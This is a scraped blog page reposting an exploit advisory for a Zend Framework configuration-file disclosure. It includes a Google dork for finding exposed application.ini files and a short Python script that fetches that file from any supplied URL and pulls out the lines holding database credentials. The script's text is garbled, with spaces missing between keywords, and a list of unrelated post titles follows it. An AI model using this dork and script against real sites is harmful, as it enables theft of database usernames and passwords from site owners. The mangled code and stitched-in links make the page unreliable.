Zend-Framework - Full Info Disclosure

来源：互联网发布：java搞笑程序编辑：程序博客网时间：2024/04/29 15:15

# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux
  
#[Comment]Greetz : Daniel Godoy
  
#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file
  
#Vulnerable page : http://target.com/application/configs/application.ini
  
  
#!/usr/bin/python
importstring 
importre 
fromurllib2 importRequest, urlopen 
disc ="/application/configs/application.ini"
url =raw_input ("URL: ")
req =Request(url+disc)
rta =urlopen(req) 
print"Result"
html =rta.read() 
rdo =str(re.findall("resources.*=*", html))
printrdo 
exit

Zend-Framework - Full Info Disclosure
Zend Framework suffers from a SQL configuration file disclosure vulnerability.
full-disclosure发信
Drupal 7.14 <= Full Path Disclosure Vulnerability
zend framework
Zend Framework
Zend Framework
zend framework,,,,,
Zend frameWork
zend framework
zend framework
zend framework
Zend Framework
zend studio + zend framework
PHP <=5.3 – preg_match() full path disclosure
Zend framework简介
Zend Framework 入门教程
Zend Framework and Mysql
ARM920T内存管理单元MMU
戴维·卡梅伦
linux shell编程指南第十七章------条件测试
【ZJOI2008】 COUNT
android 通话记录的查询与删除
Zend-Framework - Full Info Disclosure
android输入设备配置文件搜索路径
关于如何写分治法程序和递归程序
Windows/linux双系统的时间修改问题
C++调用C# COM组件
android删除和查询通话记录
关于rmi的研究
linux 进程的权限与用户权限及文件属性的关系
UVA 10354 nlogn LIS